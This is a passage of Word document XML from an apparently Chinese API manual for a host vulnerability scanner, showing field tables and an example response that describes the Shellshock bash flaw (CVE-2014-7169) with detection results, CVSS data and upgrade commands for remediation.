          <w:p w14:paraId="36FBBF17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72DEA8F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63054D91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0B962CCD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39E0969E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77FF0AC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E4D7D44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DCB4EAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="51E7F4D4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B4161CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3651F18E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00ACA6A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A816AB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="62724589" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AA84241" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34029E44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="637E6AB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03D02042" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="31C39DCF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54E29680" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13B47E66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E61D6FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A8169C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4AB482B8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3889CF9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19EE8378" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E36465E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="333671B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A07AA82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="225" w:name="_Toc115166187"/>
      <w:bookmarkStart w:id="226" w:name="查询漏洞风险详情"/>
      <w:bookmarkEnd w:id="224"/>
      <w:r>
        <w:t>查询漏洞风险详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>
    </w:p>
    <w:p w14:paraId="6324F2A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7DB7B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{Id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FD2F5C"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630"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1988"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2FD7084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C0EB463" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B2B1D3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="700DC736" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BA04DD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="47956669" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67643C3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B67EAD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CA83B07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CED52FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描结果的唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4986B451" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC07006" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5c3d9930871e1b31a1c5c2c1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249685E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B9BBA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042014001966",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Bash环境变量远程命令执行漏洞(CVE-2014-7169)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "apps": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "Bash"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "desc": "GNU Bash 存在安全漏洞，该漏洞源于GNU Bash 允许在环境变量的值中的函数定义，及在函数定义后加入额外的字符串，攻击者可利用此特性在远程写入文件或执行其他可以影响到系统的操作。如涉及</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ForceCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">功能的向量所示OpenSSH </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，Apache HTTP Server中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mod_cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mod_cgid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>模块，由未指定的DHCP客户端执行的脚本，以及在Bash执行的特权边界内设置环境的其他情况。由于CVE-2014-6271的修复程序不完整，因此存在此漏洞。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>restartOpts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>publicDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2014-09-24 00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstCheckTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2019-05-20 01:30:23",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "family": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "severity": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "版本比对检测原理：检查当前系统中Bash版本是否在受影响版本内|版本比对检测结果：- bash\r\n  当前安装版本：3.2-24.el5\r\n  漏洞修复版本：3.2-33.el5_11.4\r\n该主机存在此漏洞|POC检测原理：检查当前系统中Bash版本是否在受影响版本内|POC检测结果：当前主机存在漏洞，在/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>目录中发现</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>生成的文件/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/QT_Test_1558287004",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocCheckInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "bash官方在修复CVE-2014-6271漏洞时，由于考虑情况不全，导致漏洞修复可以被绕过，从而致使新的漏洞出现。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": "{\"code\": 0, \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execute_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": 3, \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cve_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": \"CVE-2014-7169\", \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": {\"vuln\": 1, \"code\": 0, \"result\": {\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": [{\"msg\": \"\\u5b58\\u5728\\u6f0f\\u6d1e\", \"vuln\": true, \"info\": \"\\u5728/dev/shm\\u76ee\\u5f55\\u4e2d\\u53d1\\u73b0Poc\\u751f\\u6210\\u7684\\u6587\\u4ef6/dev/shm/QT_Test_1558287004\"}]}, \"error\": \"\"}, \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": \"24b7d45d8095b846\", \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ver_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": {\"vuln\": 1, \"code\": 0, \"result\": {\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": [{\"code\": 1, \"version\": \"3.2-24.el5\", \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fix_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": \"3.2-33.el5_11.4\", \"name\": \"bash\"}]}, \"error\": \"\"}}",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remedDescription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "升级bash到最新版本，漏洞修复后需要重启bash服务，建议业务不繁忙时修复。使用以下命令升级：   \r\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nRHEL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/CentOS : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> yum update -y bash \r\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nUbuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt-get update &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt-get install --only-upgrade -y bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "kernel": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remote": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localEscalation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasPoc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "AV:N/AC:L/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Au:N</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/C:C/I:C/A:C",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cvssScore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 10,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "refs": "CNVD-2014-06435,BID-70137",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>expRefs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "https://cve.mitre.org/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cvename.cgi?name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=CVE-2014-7169",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocRefs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "https://www.exploit-db.com/exploits/34879/\r\nhttps://www.exploit-db.com/exploits/36503/\r\nhttps://www.exploit-db.com/exploits/36504/\r\nhttps://www.exploit-db.com/exploits/35115/\r\nhttps://www.exploit-db.com/exploits/34766/\r\nhttps://www.exploit-db.com/exploits/36609/\r\nhttps://www.exploit-db.com/exploits/35146/\r\nhttps://www.exploit-db.com/exploits/34765/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cves</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "CVE-2014-7169"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "category": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        8</w:t>
      </w:r>
      <w:r>
        <w:br/>
